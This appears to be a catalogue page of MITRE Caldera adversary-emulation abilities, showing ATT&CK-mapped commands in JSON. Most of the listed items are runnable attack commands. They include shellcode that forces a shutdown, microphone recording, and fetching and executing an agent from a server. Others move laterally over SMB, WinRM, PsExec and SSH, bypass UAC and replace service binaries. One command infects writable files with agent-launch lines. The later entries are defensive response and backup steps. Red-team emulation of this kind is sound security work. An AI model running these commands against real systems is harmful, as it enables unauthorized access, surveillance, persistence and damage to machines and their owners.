
Caldera emulation abilities

211 runnable adversary-emulation actions · command + platform · mapped to ATT&CK

Abilities

50 shown of 211
impact ["darwin", "linux", "windows"] T1499 · Endpoint Denial of Service ↗
Disrupt WIFI
Turn a computer's WIFI off
[{"platform": "darwin", "executor": "sh", "command": "./wifi.sh off\n"}, {"platform": "linux", "executor": "sh", "command": "./wifi.sh off\n"}, {"platform": "windows", "executor": "psh", "command": ".\\wifi.ps1 -Off\n"}]
impact ["darwin", "linux", "windows"] T1565.001 · Data Manipulation: Stored Data Manipulation ↗
File Hunter Mission
Hunts for files of a certain extension and inserts a message
[{"platform": "darwin", "executor": "sh", "command": "./mission.go -duration 60 -extension .caldera -dir '/'"}, {"platform": "linux", "executor": "sh", "command": "./mission.go -duration 60 -extension .caldera -dir '/'"}, {"platform": "windows", "executor": "cmd", "command": "copy mission.go mission.exe &&mission.exe -duration 60 -extension .caldera -dir C:\\"}, {"platform": "windows", "executor": "psh", "command": "mv mission.go mission.exe;.\\mission.exe -duration 60 -extension .caldera -dir 'C:\\';"}]
impact ["windows"] T1491 · Defacement ↗
Invoke-MemeKatz
Downloads random meme and sets as desktop background
[{"platform": "windows", "executor": "psh,pwsh", "command": ".\\Invoke-MemeKatz.ps1\n"}, {"platform": "windows", "executor": "cmd", "command": "powershell.exe -ep bypass -c \"Invoke-MemeKatz.ps1\"\n"}]
impact ["darwin", "linux", "windows"] T1491 · Defacement ↗
Leave note
Create a text file for the user to find
[{"platform": "darwin", "executor": "sh", "command": "echo \"proof that this machine was hacked.\" > message.txt\n"}, {"platform": "linux", "executor": "sh", "command": "echo \"proof that this machine was hacked.\" > message.txt\n"}, {"platform": "windows", "executor": "psh", "command": "Set-Content -Path 'message.txt' -Value 'proof that this machine was hacked.'\n"}]
impact ["darwin"] T1489 · Service Stop ↗
Quit Outlook
Quit Outlook
[{"platform": "darwin", "executor": "osa", "command": "quit app \"Microsoft Outlook.app\""}]
Record microphone
Install sox and record microphone for n-seconds
[{"platform": "darwin", "executor": "sh", "command": "brew install sox >/dev/null 2>&1;\nsox -d recording.wav trim 0 15 >/dev/null 2>&1;\n"}]
Shutdown Target System
Force shutdown a target system using Process Injection and raw shellcode
[{"platform": "linux", "executor": "shellcode_amd64,shellcode_386", "command": "0x48, 0x31, 0xc0, 0x48, 0x31, 0xd2, 0x50, 0x6a, 0x77, 0x66, 0x68, 0x6e, 0x6f, 0x48, 0x89, 0xe3, 0x50, 0x66, 0x68, 0x2d, 0x68, 0x48, 0x89, 0xe1, 0x50, 0x49, 0xb8, 0x2f, 0x73, 0x62, 0x69, 0x6e, 0x2f, 0x2f, 0x2f, 0x49, 0xba, 0x73, 0x68, 0x75, 0x74, 0x64, 0x6f, 0x77, 0x6e, 0x41, 0x52, 0x41, 0x50, 0x48, 0x89, 0xe7, 0x52, 0x53, 0x51, 0x57, 0x48, 0x89, 0xe6, 0x48, 0x83, 0xc0, 0x3b, 0x0f, 0x05\n"}]
Copy 54ndc47 (SMB)
Copy 54ndc47 to remote host (SMB)
[{"platform": "windows", "executor": "psh", "command": "$path = \"sandcat.go-windows\";\n$drive = \"\\\\#{remote.host.fqdn}\\C$\";\nCopy-Item -v -Path $path -Destination $drive\"\\Users\\Public\\s4ndc4t.exe\";\n"}]
lateral-movement ["windows", "darwin", "linux"] T1570 · Lateral Tool Transfer ↗
Copy 54ndc47 (WinRM and SCP)
Copy 54ndc47 to the remote host over WinRM (PowerShell 5 or newer only) or SCP
[{"platform": "windows", "executor": "psh,pwsh", "command": "$job = Start-Job -ScriptBlock {\n  $username = \"#{domain.user.name}\";\n  $password = \"#{domain.user.password}\";\n  $secstr = New-Object -TypeName System.Security.SecureString;\n  $password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)};\n  $cred = New-Object -Typename System.Management.Automation.PSCredential -Argumentlist $username, $secstr;\n  $session = New-PSSession -ComputerName \"#{remote.host.name}\" -Credential $cred;\n  $location = \"#{location}\";\n  $exe = \"#{exe_name}\";\n  Copy-Item $location -Destination \"C:\\Users\\Public\\svchost.exe\" -ToSession $session;\n  Start-Sleep -s 5;\n  Remove-PSSession -Session $session;\n};\nReceive-Job -Job $job -Wait;\n"}, {"platform": "darwin", "executor": "sh", "command": "scp -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 sandcat.go-darwin #{remote.ssh.cmd}:~/sandcat.go\n"}, {"platform": "linux", "executor": "sh", "command": "scp -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 sandcat.go-linux #{remote.ssh.cmd}:~/sandcat.go\n"}]
Copy Sandcat File using Powershell
Copy Sandcat file using PowerShell
[{"platform": "windows", "executor": "psh", "command": "$server=\"#{server}\";\n$sharePath=\"#{share}\";\nSet-Location $sharePath;$url=\"$($server)/file/download\";\n$wc=New-Object System.Net.WebClient;$wc.Headers.add(\"platform\",\"windows\");\n$wc.Headers.add(\"file\",\"sandcat.go\");($data=$wc.DownloadData($url)) -and\n($name=$wc.ResponseHeaders[\"Content-Disposition\"].Substring($wc.ResponseHeaders[\"Content-Disposition\"].IndexOf(\"filename=\")+9).Replace(\"`\"\",\"\"))\n-and ([io.file]::WriteAllBytes(\"$($sharePath)$name.exe\",$data));\n$startServer=\"$($sharePath)$name.exe -server $($server) \";Invoke-Command\n-ScriptBlock {Param([string]$startServer, $sharePath, $name, $server)  Invoke-WmiMethod\n-Class Win32_Process -Name Create -ArgumentList \"$($sharePath)$name.exe\n-server $server -v\" } -ComputerName #{remote.host.name} -ArgumentList $startServer, $sharePath, $name, $server\n"}]
lateral-movement ["windows"] T1570 · Lateral Tool Transfer ↗
Copy Sandcat File using PsExec on CMD
Copy Sandcat file using PsExec on CMD
[{"platform": "windows", "executor": "cmd", "command": "net /y use \\\\#{remote.host.name} & copy /y sandcat.go-windows\n\\\\#{remote.host.name}\\Users\\Public & #{psexec.path} -accepteula \\\\#{remote.host.name}\ncmd /c start C:\\Users\\Public\\sandcat.go-windows -server #{server} -v\n"}]
lateral-movement []
Lateral Movement - Certutil
Uses CertUtil as a living-off-the-land technique to move the .exe agent disguised as a certificate, relying only on Windows-signed binaries
[]
lateral-movement []
Lateral Movement - esentutl
Tool transfer to lateral hosts using Alternate Data Streams to hide implant
[]
Mount Share
Mount a windows share
[{"platform": "windows", "executor": "psh", "command": "net use \\\\#{remote.host.fqdn}\\C$ /user:#{domain.user.name} #{domain.user.password}\n"}]
Net use
Mounts a network file share on a target computer
[{"platform": "windows", "executor": "psh", "command": "net use \\\\#{remote.host.ip}\\c$ /user:#{domain.user.name} #{domain.user.password};\n"}]
lateral-movement ["darwin", "linux"] T1021.004 · Remote Services: SSH ↗
Start 54ndc47
Copy 54ndc47 to remote host and start it, assumes target uses SSH keys and passwordless authentication
[{"platform": "darwin", "executor": "sh", "command": "scp -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 sandcat.go-darwin #{remote.ssh.cmd}:~/sandcat.go &&\nssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 #{remote.ssh.cmd} 'nohup ./sandcat.go -server #{server} -group red 1>/dev/null 2>/dev/null &'\n"}, {"platform": "linux", "executor": "sh", "command": "scp -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 sandcat.go-linux #{remote.ssh.cmd}:~/sandcat.go &&\nssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 #{remote.ssh.cmd} 'nohup ./sandcat.go -server #{server} -group red 1>/dev/null 2>/dev/null &'\n"}]
Start Agent (WinRM)
Start Agent using WinRM (WinRM)
[{"platform": "windows", "executor": "psh", "command": "$username = \"#{domain.user.name}\";\n$password = \"#{domain.user.password}\";\n$secstr = New-Object -TypeName System.Security.SecureString;\n$password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)};\n$cred = New-Object -Typename System.Management.Automation.PSCredential -Argumentlist $username, $secstr;\n$session = New-PSSession -ComputerName #{remote.host.name} -Credential $cred;\nInvoke-Command -Session $session -ScriptBlock{start-job -scriptblock{cmd.exe /c start C:\\Users\\Public\\svchost.exe -server #{server} }};\nStart-Sleep -s 5;\nRemove-PSSession -Session $session;\n"}]
persistence []
Create persistence cron job for current user
After target host is rebooted, it will automatically reach out to the caldera server to download and execute the caldera agent, creating persistent access after reboot.
[]
persistence []
Create persistence cron job for root user (requires sudo)
After target host is rebooted, it will automatically reach out to the caldera server to download and execute the caldera agent, creating persistent root access after reboot.
[]
Replace a service binary with alternate binary
This is an example technique. snmptrap.exe should be changed in the command below with the new desired service binary. Depending on the value of host.service.modifiable this ability can damage the target system.
[{"platform": "windows", "executor": "psh", "command": "$s = Get-Service -Name #{host.service.modifiable};\nif ($s.status -ne 'Stopped') { Stop-Service $s };\n$exe = (Get-ItemProperty -Path \"HKLM:\\System\\CurrentControlSet\\Services\\#{host.service.modifiable}\").ImagePath.split()[0];\n$path = (Resolve-Path $exe).Path;\nCopy-Item -Path $path -Destination ($path + \".saved\");\nCopy-Item -Path \"C:\\Windows\\System32\\snmptrap.exe\" -Destination $path\n"}]
privilege-escalation []
Abuse Linux Capability: Python3
Use python3 to pull down Caldera agent as root
[]
Bypass UAC Medium
Bypass user account controls - medium
[{"platform": "windows", "executor": "psh", "command": "$url=\"#{server}/file/download\"; $wc=New-Object System.Net.WebClient; $wc.Headers.add(\"platform\",\"windows\"); $wc.Headers.add(\"file\",\"sandcat.go\"); $data=$wc.DownloadData($url); $name=$wc.ResponseHeaders[\"Content-Disposition\"].Substring($wc.ResponseHeaders[\"Content-Disposition\"].IndexOf(\"filename=\")+9).Replace(\"`\"\",\"\"); [io.file]::WriteAllBytes(\"C:\\Users\\Public\\$name.exe\",$data);\n$job = Start-Job -ScriptBlock { Import-Module -Name .\\Bypass-UAC.ps1; Bypass-UAC -Command \"C:\\Users\\Public\\$name.exe -group #{group}\"; };\nReceive-Job -Job $job -Wait;\n"}]
privilege-escalation []
SUID Find & Exploit
Finds all SUID binaries and executes relevant cmds
[]
Slui File Handler Hijack
Executes the slui.exe file handler hijack
[{"platform": "windows", "executor": "psh", "command": ".\\Akagi64.exe 45 C:\\Windows\\System32\\cmd.exe\n"}]
UAC bypass registry
Set a registry key to allow UAC bypass
[{"platform": "windows", "executor": "psh", "command": "New-ItemProperty -Path HKLM:Software\\Microsoft\\Windows\\CurrentVersion\\policies\\system -Name EnableLUA -PropertyType DWord -Value 0 -Force\n"}]
Weak executable files
Locate and infect files with weak but executable permissions
[{"platform": "darwin", "executor": "sh", "command": "find / -type f -size -500k -maxdepth 5 -perm -333 2>/dev/null -exec sh -c 'grep -qF \"54NDC47_SCRIPT\" \"{}\" || echo \"#54NDC47_SCRIPT\\n\" \"chmod +x sandcat.go-darwin && sandcat.go-darwin\" >> \"{}\"; ls \"{}\" ' \\; | echo \"complete\"\n"}, {"platform": "linux", "executor": "sh", "command": "find / -type f -size -500k -maxdepth 5 -perm -333 2>/dev/null -exec sh -c 'grep -qF \"54NDC47_SCRIPT\" \"{}\" || echo \"#54NDC47_SCRIPT\\n\" \"chmod +x sandcat.go-linux && sandcat.go-linux\" >> \"{}\"; ls \"{}\" ' \\; | echo \"complete\"\n"}]
duser/osksupport DLL Hijack
UIPI bypass with uiAccess application
[{"platform": "windows", "executor": "psh", "command": "$url=\"#{server}/file/download\";\n$wc=New-Object System.Net.WebClient;\n$wc.Headers.add(\"platform\",\"windows\");\n$wc.Headers.add(\"file\",\"sandcat.go\");\n$wc.Headers.add(\"server\",\"#{server}\");\n$wc.Headers.add(\"defaultSleep\",\"60\");\n$wc.Headers.add(\"defaultGroup\",\"bypassed_u_bro\");\n$data=$wc.DownloadData($url);\n$name=$wc.ResponseHeaders[\"Content-Disposition\"].Substring($wc.ResponseHeaders[\"Content-Disposition\"].IndexOf(\"filename=\")+9).Replace(\"`\"\",\"\");\n[io.file]::WriteAllBytes(\"C:\\Users\\Public\\$name.exe\",$data);\n.\\Akagi64.exe 32 \"C:\\Users\\Public\\$name.exe -server #{server}\"\n"}]
wow64log DLL Hijack
Dll Hijack of WOW64 logger wow64log.dll using Akagi.exe
[{"platform": "windows", "executor": "cmd,psh", "command": ".\\Akagi64.exe 30 C:\\Windows\\System32\\cmd.exe\n"}]
response ["windows"] x · Query Event Logs ↗
Collect Child Processes
Collect child processes from Sysmon logs
[{"platform": "windows", "executor": "psh", "command": "$time_range = (Get-Date) - (New-TimeSpan -Seconds $(#{sysmon.time.range}/1000));\nGet-WinEvent -FilterHashTable @{ Logname='Microsoft-Windows-Sysmon/Operational'; StartTime=$time_range; Id=1} | where -Property Message -Match '(?m)^ParentProcessGuid: {#{host.process.guid}}' | Format-List;\n"}, {"platform": "windows", "executor": "cmd", "command": "wevtutil qe Microsoft-Windows-Sysmon/Operational /q:\"*/System/TimeCreated[timediff(@SystemTime) <= #{sysmon.time.range}] and */EventData/Data[@Name='ParentProcessGuid']=#{host.process.guid} and Event[System[EventID=1]]\" /f:text\n"}]
response ["windows"] x · Query Event Logs ↗
Collect GUID from PID
Collect process GUIDs by querying Sysmon for all events associated with the given PID
[{"platform": "windows", "executor": "psh", "command": "$time_range = (Get-Date) - (New-TimeSpan -Seconds $(#{sysmon.time.range}/1000));\nGet-WinEvent -FilterHashTable @{ Logname='Microsoft-Windows-Sysmon/Operational'; StartTime=$time_range; Id=1} | where -Property Message -Match '(?m)^ProcessId: #{host.process.id}\\b' | Format-List;\n"}, {"platform": "windows", "executor": "cmd", "command": "wevtutil qe Microsoft-Windows-Sysmon/Operational /q:\"*/System/TimeCreated[timediff(@SystemTime) <= #{sysmon.time.range}] and */EventData/Data[@Name='ProcessId']=#{host.process.id}\" /f:text\n"}]
response ["windows"] x · Query Event Logs ↗
Collect Grandchild Processes
Collect grandchild processes from Sysmon logs
[{"platform": "windows", "executor": "psh", "command": "$time_range = (Get-Date) - (New-TimeSpan -Seconds $(#{sysmon.time.range}/1000));\nGet-WinEvent -FilterHashTable @{ Logname='Microsoft-Windows-Sysmon/Operational'; StartTime=$time_range; Id=1} | where -Property Message -Match '(?m)^ParentProcessId: #{host.process.childid}\\b' | Format-List;\n"}, {"platform": "windows", "executor": "cmd", "command": "wevtutil qe Microsoft-Windows-Sysmon/Operational /q:\"*/System/TimeCreated[timediff(@SystemTime) <= #{sysmon.time.range}] and */EventData/Data[@Name='ParentProcessId']=#{host.process.childid} and Event[System[EventID=1]]\" /f:text\n"}]
response ["windows"] x · Query Event Logs ↗
Collect Parent's Child Processes
Collect all process creation events with the given parent process GUID
[{"platform": "windows", "executor": "psh", "command": "$time_range = (Get-Date) - (New-TimeSpan -Seconds $(#{sysmon.time.range}/1000));\nGet-WinEvent -FilterHashTable @{ Logname='Microsoft-Windows-Sysmon/Operational'; StartTime=$time_range; Id=1 } | where -Property Message -Match \"\\bParentProcessGuid: {#{host.process.parentguid}}\" | Format-List;\n"}, {"platform": "windows", "executor": "cmd", "command": "wevtutil qe Microsoft-Windows-Sysmon/Operational /q:\"*/System/TimeCreated[timediff(@SystemTime) <= #{sysmon.time.range}] and */System/EventID=1 and */EventData/Data[@Name='ParentProcessGuid']='#{host.process.parentguid}'\" /f:text"}]
response ["windows"] x · x ↗
Delete known suspicious files
Use hash of known suspicious file to find instances of said file, and delete instances
[{"platform": "windows", "executor": "psh", "command": "Remove-Item -Path #{host.malicious.file} -Force;\n"}]
response ["windows"] T1065 · Uncommonly Used Port ↗
Enable Inbound TCP/UDP firewall rule
Blocks inbound TCP and UDP traffic on a specific port
[{"platform": "windows", "executor": "psh, pwsh", "command": "New-NetFirewallRule -DisplayName \"Block in-bound UDP traffic to port #{host.port.unauthorized} from PID #{host.pid.unauthorized}\" -Group \"Caldira\" -Direction Inbound -Protocol UDP -Action Block -LocalPort #{host.port.unauthorized};\nNew-NetFirewallRule -DisplayName \"Block in-bound TCP traffic to port #{host.port.unauthorized} from PID #{host.pid.unauthorized}\" -Group \"Caldira\" -Direction Inbound -Protocol TCP -Action Block -LocalPort #{host.port.unauthorized};\n"}]
response ["windows"] T1065 · Uncommonly Used Port ↗
Enable Outbound TCP/UDP firewall rule
Blocks outbound TCP and UDP traffic on a specific port
[{"platform": "windows", "executor": "psh, pwsh", "command": "New-NetFirewallRule -DisplayName \"Block out-bound UDP traffic to port #{remote.port.unauthorized} from PID #{host.pid.unauthorized}\" -Group \"Caldira\" -Direction Outbound -Protocol UDP -Action Block -RemotePort #{remote.port.unauthorized};\nNew-NetFirewallRule -DisplayName \"Block out-bound TCP traffic to port #{remote.port.unauthorized} from PID #{host.pid.unauthorized}\" -Group \"Caldira\" -Direction Outbound -Protocol TCP -Action Block -RemotePort #{remote.port.unauthorized};\n"}]
response ["linux", "darwin", "windows"] x · x ↗
Inoculate C2
Reroute suspicious IP addresses to localhost by editing the hosts file
[{"platform": "linux", "executor": "sh", "command": "if ! test -f hosts_backup; then cp /etc/hosts hosts_backup; fi;\necho \"127.0.0.1    #{remote.suspicious.url}\" >> /etc/hosts;\n"}, {"platform": "darwin", "executor": "sh", "command": "if ! test -f hosts_backup; then cp /etc/hosts hosts_backup; fi;\necho \"127.0.0.1    #{remote.suspicious.url}\" >> /etc/hosts;\n"}, {"platform": "windows", "executor": "psh", "command": "if (-not (Test-Path -Path .\\hosts_backup)) { Copy-Item -Path c:\\windows\\system32\\drivers\\etc\\hosts -Destination .\\hosts_backup; };\nAdd-Content c:\\windows\\system32\\drivers\\etc\\hosts \"127.0.0.1`t#{remote.suspicious.url}\";\n"}]
response ["linux", "darwin", "windows"] x · x ↗
Kill rogue process
Force kill any unauthorized processes
[{"platform": "linux", "executor": "sh", "command": "kill -9 #{host.pid.unauthorized}\n"}, {"platform": "darwin", "executor": "sh", "command": "kill -9 #{host.pid.unauthorized}\n"}, {"platform": "windows", "executor": "psh,pwsh", "command": "Stop-Process -Id #{host.pid.unauthorized} -Force\n"}, {"platform": "windows", "executor": "cmd", "command": "taskkill /pid #{host.pid.unauthorized} /f\n"}]
response ["linux", "darwin"] x · x ↗
Remove Unauthorized Cron Job
Removes newly added cron jobs
[{"platform": "linux", "executor": "sh", "command": "crontab -u #{host.user.name} -l > temp_crontab;\nline_number=$(grep -n '#{host.new.cronjob}' temp_crontab | cut -d':' -f1);\nif [ $line_number ]; then\n  sed \"${line_number}d\" temp_crontab > new_crontab;\n  crontab -u #{host.user.name} new_crontab;\n  rm -f new_crontab;\nfi;\nrm -f temp_crontab new_crontab;\n"}, {"platform": "darwin", "executor": "sh", "command": "crontab -u #{host.user.name} -l > temp_crontab;\nline_number=$(grep -n '#{host.new.cronjob}' temp_crontab | cut -d':' -f1);\nif [ $line_number ]; then\n  sed \"${line_number}d\" temp_crontab > new_crontab;\n  crontab -u #{host.user.name} new_crontab;\n  rm -f new_crontab;\nfi;\nrm -f temp_crontab new_crontab;\n"}]
response ["windows"] x · x ↗
Remove Unauthorized Scheduled Task
Removes newly added scheduled tasks
[{"platform": "windows", "executor": "psh", "command": "Unregister-ScheduledTask -TaskName #{host.new.schtask} -Confirm:$false\n"}]
response ["linux", "darwin", "windows"] x · x ↗
Restore File Backup
Restore backups of files if a file has been modified
[{"platform": "linux", "executor": "sh", "command": "cp -f /tmp/sensitive_file_backups/#{file.backup.name} #{file.sensitive.path}\n"}, {"platform": "darwin", "executor": "sh", "command": "cp -f /tmp/sensitive_file_backups/#{file.backup.name} #{file.sensitive.path}\n"}, {"platform": "windows", "executor": "psh", "command": "Copy-Item \"C:\\Users\\Public\\sensitive_file_backups\\#{file.backup.name}\" -Destination \"#{file.sensitive.path}\" -Force\n"}]
response ["linux", "darwin", "windows"] x · x ↗
Restore Modified Sensitive Directory
Restore sensitive directories with their backups if they have been modified
[{"platform": "linux", "executor": "sh", "command": "directory=\"#{directory.sensitive.path}\";\nmkdir -p $directory;\nrm -r ${directory}/*;\ntar -xzf /tmp/sensitive_file_backups/#{directory.sensitive.backup} -C $directory;\n"}, {"platform": "darwin", "executor": "sh", "command": "directory=\"#{directory.sensitive.path}\";\nmkdir -p $directory;\nrm -r ${directory}/*;\ntar -xzf /tmp/sensitive_file_backups/#{directory.sensitive.backup} -C $directory;\n"}, {"platform": "windows", "executor": "psh", "command": "$directory = \"#{directory.sensitive.path}\";\nNew-Item -ItemType Directory -Force -Path $directory | Out-Null;\nRemove-Item -Path \"$($directory)\\*\" -Recurse -EA silentlycontinue;\nExpand-Archive -LiteralPath \"C:\\Users\\Public\\sensitive_file_backups\\#{directory.sensitive.backup}\" -DestinationPath \"$($directory)\\\";\n"}]
response ["windows"] x · Query Event Logs ↗
System Information from GUID
Collect system information from Sysmon event log given ProcessGUID. Ability timeout may need to be increased depending on Sysmon log size.
[{"platform": "windows", "executor": "psh", "command": "$time_range = (Get-Date) - (New-TimeSpan -Seconds $(#{sysmon.time.range}/1000));\nGet-WinEvent -FilterHashTable @{ Logname='Microsoft-Windows-Sysmon/Operational'; StartTime=$time_range; } | select TimeCreated,Id,ProviderName,RecordId,ProcessId,MachineName,Message | where -Property Message -Match \"\\bProcessGuid: {#{host.process.guid}}\" | Format-List;\n"}, {"platform": "windows", "executor": "cmd", "command": "wevtutil qe Microsoft-Windows-Sysmon/Operational /q:\"*/System/TimeCreated[timediff(@SystemTime) <= #{sysmon.time.range}] and */EventData/Data[@Name='ProcessGuid']='#{host.process.guid}'\" /f:text\n"}]
setup ["linux", "darwin"] x · x ↗
Backup Bash Profiles
If bash profile doesn't exist, create it, and then backup each profile.
[{"platform": "linux", "executor": "sh", "command": "mkdir -p /tmp/sensitive_file_backups;\nuser_profiles=\".bashrc .bash_profile .bash_login .profile\";\noutput=\"\";\nhome_dir=$(echo \"/home/*\" | sed 's/\\\\\\*/\\*/g');\ndirs=$(find $home_dir -maxdepth 0 -type d);\ndirs=\"${dirs} /root\";\nfiles=\"\";\nfor dir in $dirs;\n  do for prof in $user_profiles;\n    do files=\"${files}${dir}/${prof} \";\n  done;\ndone;\nfiles=\"${files} /etc/profile /etc/bash.bashrc\";\nfor file in $files;\n  do if [ ! -f $file ];\n    then touch $file;\n  fi;\n  randname=$(head /dev/urandom | tr -dc A-Za-z0-9 | head -c 13);\n  cp $file /tmp/sensitive_file_backups/$randname;\n  output=\"${output}${file}>${randname}\\n\";\ndone;\necho $output | sed '/^[[:space:]]*$/d'\n"}, {"platform": "darwin", "executor": "sh", "command": "mkdir -p /tmp/sensitive_file_backups;\nuser_profiles=\".bashrc .bash_profile .bash_login .profile\";\noutput=\"\";\nhome_dir=$(echo \"/Users/*\" | sed 's/\\\\\\*/\\*/g');\ndirs=$(find $home_dir -maxdepth 0 -type d);\ndirs=\"${dirs} /var/root\";\nfiles=\"\";\nfor dir in $dirs;\n  do for prof in $user_profiles;\n    do files=\"${files}${dir}/${prof} \";\n  done;\ndone;\nfiles=\"${files} /etc/profile /etc/bash.bashrc\";\nfor file in $files;\n  do if [ ! -f $file ];\n    then touch $file;\n  fi;\n  randname=$(head /dev/urandom | LC_CTYPE=C tr -dc A-Za-z0-9 | head -c 13);\n  cp $file /tmp/sensitive_file_backups/$randname;\n  output=\"${output}${file}>${randname}\\n\";\ndone;\necho $output | sed '/^[[:space:]]*$/d'\n"}]
setup ["windows"] x · x ↗
Backup Powershell Profiles
This ability creates backups of PowerShell profiles, creating the profiles themselves if they do not exist.
[{"platform": "windows", "executor": "psh", "command": "$files = @(\"$Profile\", \"$PsHome\\Profile.ps1\", \"$PsHome\\Microsoft.Powershell_profile.ps1\");\nNew-Item -ItemType Directory -Force -Path C:\\Users\\Public\\sensitive_file_backups | Out-Null;\n$output = '';\nForEach ($file in $files) {\n  if (-not (Test-Path $file)) {\n    New-Item -Path $file -ItemType File | Out-Null;\n  };\n  $randname = -join (( 0x41..0x5A) + ( 0x61..0x7A) | Get-Random -Count 13 | % {[char]$_});\n  Copy-Item $file -Destination \"C:\\Users\\Public\\sensitive_file_backups\\$randname\";\n  $output = \"$($output)$($file)>$($randname)`n\"\n};\n$output\n"}]
setup ["linux", "darwin", "windows"] x · x ↗
Backup Sensitive Directories
Create compressed backups of sensitive directories
[{"platform": "linux", "executor": "sh", "command": "mkdir -p /tmp/sensitive_file_backups;\ndir_path=$(echo \"#{directory.sensitive.path}\" | sed 's/\\\\\\*/\\*/g');\ndirectories=$(find $dir_path -maxdepth 0 -type d 2>/dev/null);\noutput=\"\";\nfor directory in $directories;\n  do if [ -z \"$(ls -A $directory)\" ]; then\n    touch \"${directory}/.bak\";\n  fi;\n  randname=$(head /dev/urandom | tr -dc A-Za-z0-9 | head -c 13);\n  tar -czf /tmp/sensitive_file_backups/${randname}.tar.gz -C $directory .;\n  output=\"${output}${directory}>${randname}.tar.gz\\n\";\ndone;\necho $output | sed '/^[[:space:]]*$/d'\n"}, {"platform": "darwin", "executor": "sh", "command": "mkdir -p /tmp/sensitive_file_backups;\ndir_path=$(echo \"#{directory.sensitive.path}\" | sed 's/\\\\\\*/\\*/g');\ndirectories=$(find $dir_path -maxdepth 0 -type d 2>/dev/null);\noutput=\"\";\nfor directory in $directories;\n  do if [ -z \"$(ls -A $directory)\" ]; then\n    touch \"${directory}/.bak\";\n  fi;\n  randname=$(head /dev/urandom | LC_CTYPE=C tr -dc A-Za-z0-9 | head -c 13);\n  tar -czf /tmp/sensitive_file_backups/${randname}.tar.gz -C $directory .;\n  output=\"${output}${directory}>${randname}.tar.gz\\n\";\ndone;\necho $output | sed '/^[[:space:]]*$/d'\n"}, {"platform": "windows", "executor": "psh", "command": "New-Item -ItemType Directory -Force -Path C:\\Users\\Public\\sensitive_file_backups | Out-Null;\n$output = '';\nGet-Item #{directory.sensitive.path} -EA silentlycontinue | Where-Object { $_ -is [System.IO.DirectoryInfo] } | foreach-object {\n  if ((Get-ChildItem $_.FullName -Force | Measure-Object).count -eq 0) {\n    echo '' > $($_.FullName + \"\\.bak\");\n  };\n  $randname = -join (( 0x41..0x5A) + ( 0x61..0x7A) | Get-Random -Count 13 | % {[char]$_});\n  Compress-Archive -Force -Path $($_.FullName + \"\\*\") -DestinationPath $(\"C:\\Users\\Public\\sensitive_file_backups\\\" + $randname + \".zip\");\n  $output = \"$($output)$($_.FullName)>$($randname).zip`n\";\n};\n$output;\n"}]
setup ["linux", "darwin", "windows"] x · x ↗
Backup Sensitive Files
Backup sensitive files to temp directory in case these files are maliciously modified
[{"platform": "linux", "executor": "sh", "command": "mkdir -p /tmp/sensitive_file_backups;\nfilepath=$(echo \"#{file.sensitive.path}\" | sed 's/\\\\\\*/\\*/g');\nfiles=$(find $filepath -maxdepth 0 -type f 2>/dev/null);\noutput=\"\";\nfor file in $files;\n  do randname=$(head /dev/urandom | tr -dc A-Za-z0-9 | head -c 13);\n  cp $file /tmp/sensitive_file_backups/$randname;\n  output=\"${output}${file}>${randname}\\n\";\ndone;\necho $output | sed '/^[[:space:]]*$/d'\n"}, {"platform": "darwin", "executor": "sh", "command": "mkdir -p /tmp/sensitive_file_backups;\nfilepath=$(echo \"#{file.sensitive.path}\" | sed 's/\\\\\\*/\\*/g');\nfiles=$(find $filepath -maxdepth 0 -type f 2>/dev/null);\noutput=\"\";\nfor file in $files;\n  do randname=$(head /dev/urandom | LC_CTYPE=C tr -dc A-Za-z0-9 | head -c 13);\n  cp $file /tmp/sensitive_file_backups/$randname;\n  output=\"${output}${file}>${randname}\\n\";\ndone;\necho $output | sed '/^[[:space:]]*$/d'\n"}, {"platform": "windows", "executor": "psh", "command": "New-Item -ItemType Directory -Force -Path C:\\Users\\Public\\sensitive_file_backups | Out-Null;\n$output = '';\nGet-Item #{file.sensitive.path} -EA silentlycontinue | Where-Object { -not ($_ -is [System.IO.DirectoryInfo]) } | foreach-object {\n  $randname = -join (( 0x41..0x5A) + ( 0x61..0x7A) | Get-Random -Count 13 | % {[char]$_});\n  Copy-Item $_.FullName -Destination \"C:\\Users\\Public\\sensitive_file_backups\\$randname\";\n  $output = \"$($output)$($_.FullName)>$($randname)`n\"\n};\n$output;\n"}]
setup ["linux", "darwin"] x · x ↗
Hash Bash Profiles
If bash profile doesn't exist, create it, and then hash each profile.
[{"platform": "linux", "executor": "sh", "command": "mkdir -p /tmp/sensitive_file_backups;\nuser_profiles=\".bashrc .bash_profile .bash_login .profile\";\noutput=\"\";\nhome_dir=$(echo \"/home/*\" | sed 's/\\\\\\*/\\*/g');\ndirs=$(find $home_dir -maxdepth 0 -type d);\ndirs=\"${dirs} /root\";\nfiles=\"\";\nfor dir in $dirs;\n  do for prof in $user_profiles;\n    do files=\"${files}${dir}/${prof} \";\n  done;\ndone;\nfiles=\"${files} /etc/profile /etc/bash.bashrc\";\nfor file in $files;\n  do if [ ! -f $file ];\n    then touch $file;\n  fi;\n  hash=$(sha256sum $file | cut -d' ' -f1);\n  output=\"${output}${file}>${hash}\\n\";\ndone;\necho $output | sed '/^[[:space:]]*$/d'\n"}, {"platform": "darwin", "executor": "sh", "command": "mkdir -p /tmp/sensitive_file_backups;\nuser_profiles=\".bashrc .bash_profile .bash_login .profile\";\noutput=\"\";\nhome_dir=$(echo \"/Users/*\" | sed 's/\\\\\\*/\\*/g');\ndirs=$(find $home_dir -maxdepth 0 -type d);\ndirs=\"${dirs} /var/root\";\nfiles=\"\";\nfor dir in $dirs;\n  do for prof in $user_profiles;\n    do files=\"${files}${dir}/${prof} \";\n  done;\ndone;\nfiles=\"${files} /etc/profile /etc/bash.bashrc\";\nfor file in $files;\n  do if [ ! -f $file ];\n    then touch $file;\n  fi;\n  hash=$(shasum -a 256 $file | cut -d' ' -f1);\n  output=\"${output}${file}>${hash}\\n\";\ndone;\necho $output | sed '/^[[:space:]]*$/d'\n"}]
setup ["windows"] x · x ↗
Hash Powershell Profiles
